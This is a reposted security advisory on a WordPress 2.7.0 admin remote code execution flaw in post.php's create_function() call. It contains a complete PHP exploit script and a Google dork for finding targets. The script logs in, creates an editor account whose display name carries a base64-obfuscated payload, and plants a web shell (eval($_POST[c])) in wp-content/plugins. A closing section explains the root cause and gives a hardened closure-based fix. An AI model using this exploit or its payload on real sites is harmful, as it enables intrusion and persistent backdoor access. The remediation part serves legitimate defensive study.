Wordpress 2.7.0 admin remote code execution vulnerability
Thursday, November 26, 2009
by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18

1. Analysis:

This vulnerability lives in the admin backend :( wp-admin/post.php:

    if ( current_user_can('edit_post', $post_ID) ) {
        if ( $last = wp_check_post_lock( $post->ID ) ) {
            $last_user = get_userdata( $last );
            $last_user_name = $last_user ? $last_user->display_name : __('Somebody');
            $message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
            $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
            // a submitted \' becomes \\' after this line :)
            add_action('admin_notices', create_function( '', "echo '$message';" ) );
            // with the trick above the single quote after echo is closed, so commands can be executed [ex: \';phpinfo();\'];
            // alternatively, a bug in the create_function function itself [1] can be used to execute commands [ex: \';}phpinfo();//]
        } else {
            wp_set_post_lock( $post->ID );
            wp_enqueue_script('autosave');
        }
    }

2. EXP:

    #!/usr/bin/php
    <?php
    print_r('
    +---------------------------------------------------------------------------+
    Wordpress 2.7.0 remote code execution exploit
    by puret_t
    mail: puretot at gmail dot com
    team: http://www.wolvez.org
    site: http://www.80vul.com
    dork: "powered by WordPress"
    +---------------------------------------------------------------------------+
    ');

    /**
     * works regardless of php.ini settings
     */
    if ($argc < 6) {
        print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' host path user pass post
    host:    target server (ip/hostname)
    path:    path to wordpress
    user:    admin login username
    pass:    admin login password
    post:    the available post id
    Example: php '.$argv[0].' localhost /wp/ admin 123456 1
    +---------------------------------------------------------------------------+
    ');
        exit;
    }

    error_reporting(7);
    ini_set('max_execution_time', 0);

    $host = $argv[1];
    $path = $argv[2];
    $user = $argv[3];
    $pass = $argv[4];
    $post = $argv[5];
    $shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
    //$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
    $shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
    /**
     * wolvez.php has this code:
     * <?eval($_POST[c])?>
     */

    $url = $path.'wp-login.php';
    $cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);
    $resp = send();
    preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);
    if (!$admin_cookie) exit("Exploit Failed!\n");

    $url = $path.'wp-admin/user-new.php#add-new-user';
    $cmd = '';
    $resp = send($admin_cookie[1]);
    preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);
    if (!$_wpnonce) exit("Exploit Failed!\n");

    $cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
    $resp = send($admin_cookie[1]);
    if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false) exit("Exploit Failed!\n");

    $url = $path.'wp-login.php';
    $cmd = 'log=ryat&pwd=123456';
    $resp = send();
    preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);
    if (!$editor_cookie) exit("Exploit Failed!\n");

    $url = $path.'wp-admin/post.php?action=edit&post='.$post;
    $cmd = '';
    send($editor_cookie[1]);
    send($admin_cookie[1]);

    if (strpos(file_get_contents($shell), 'puret_t') !== false)
        exit("Exploit Success!\nView Your shell:\t$shell\n");
    else
        exit("Exploit Failed!\n");

    function send($cookie = '')
    {
        global $host, $path, $url, $cmd;

        $data  = "POST $url HTTP/1.1\r\n";
        $data .= "Accept: */*\r\n";
        $data .= "Accept-Language: zh-cn\r\n";
        $data .= "Referer: http://$host$path\r\n";
        $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $data .= "Host: $host\r\n";
        $data .= "Content-Length: ".strlen($cmd)."\r\n";
        $data .= "Connection: Close\r\n";
        $data .= "Cookie: $cookie\r\n\r\n";
        $data .= $cmd;

        $fp = fsockopen($host, 80);
        fputs($fp, $data);

        $resp = '';
        while ($fp && !feof($fp))
            $resp .= fread($fp, 1024);

        return $resp;
    }
    ?>
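The root cause in the analysis above is that a display name is spliced into PHP source text and then compiled, and the escaping step rewrites quotes but leaves backslashes alone, so a name ending in a backslash can neutralise the escape of the quote that follows it. The example below is added here and is neither WordPress code nor part of the advisory: it rebuilds the string-assembly pattern, checks whether the generated literal stays intact for a given name, and shows the hardened form, which keeps the name as data inside a closure instead of generating code. The function names (`build_notice_source_vulnerable`, `literal_is_intact`, `build_notice_safe`) and the sample names are my own; `$last_user_name` stands in for the display name. Nothing in it compiles or evaluates the generated source.

```php
<?php
// Added example, not WordPress code. Contrasts the code-generation pattern from
// wp-admin/post.php with a hardened form. $last_user_name plays the role of the
// user-controlled display name; nothing here calls create_function() or eval().

// 1) The vulnerable shape: user data is spliced into PHP source text.
function build_notice_source_vulnerable(string $last_user_name): string
{
    $message = sprintf('Warning: %s is currently editing this post', $last_user_name);
    // Escapes quotes but not backslashes, so the input \' becomes \\' inside the
    // literal: an escaped backslash followed by a live quote that ends the string.
    $message = str_replace("'", "\'", "<div class='error'><p>$message</p></div>");
    return "echo '$message';";   // the body create_function('', ...) would compile
}

// 2) Does the generated body still parse as one intact single-quoted literal?
//    A quote terminates the literal unless an odd number of backslashes precede it.
function literal_is_intact(string $body): bool
{
    $start = strpos($body, "'");
    $inner = substr($body, $start + 1, -2);   // drop leading "echo '" and trailing "';"
    $backslashes = 0;
    $len = strlen($inner);
    for ($i = 0; $i < $len; $i++) {
        $c = $inner[$i];
        if ($c === '\\') {
            $backslashes++;
            continue;
        }
        if ($c === "'" && $backslashes % 2 === 0) {
            return false;   // unescaped quote: the literal ends early, the rest is code
        }
        $backslashes = 0;
    }
    return true;
}

// 3) Hardened form: keep data as data. Encode for HTML (quotes included) and hand
//    the string to a closure; no PHP source is assembled, so no quoting can break.
function build_notice_safe(string $last_user_name): Closure
{
    $name = htmlspecialchars($last_user_name, ENT_QUOTES, 'UTF-8');
    $message = sprintf('Warning: %s is currently editing this post', $name);
    return function () use ($message): void {
        echo "<div class='error'><p>$message</p></div>";
    };
}

// Constructed sample names: a harmless one and one that ends in a backslash + quote.
$samples = ['Alice', "\\'"];
foreach ($samples as $input) {
    $body = build_notice_source_vulnerable($input);
    printf("%-8s generated literal intact: %s\n",
        var_export($input, true),
        literal_is_intact($body) ? 'yes' : 'NO');
}

// In WordPress the closure would be what add_action('admin_notices', ...) receives.
$notice = build_notice_safe("\\'");
$notice();   // the name is printed as encoded text, never compiled as code
```

The check in `literal_is_intact` reports "yes" for `Alice` and "NO" for the second sample, which is exactly the case the advisory's payload relies on. `create_function()` is deprecated since PHP 7.2 and removed in PHP 8.0; a closure that captures the already-encoded message is the direct replacement, and it also removes the need to reason about which characters the escaping step covers.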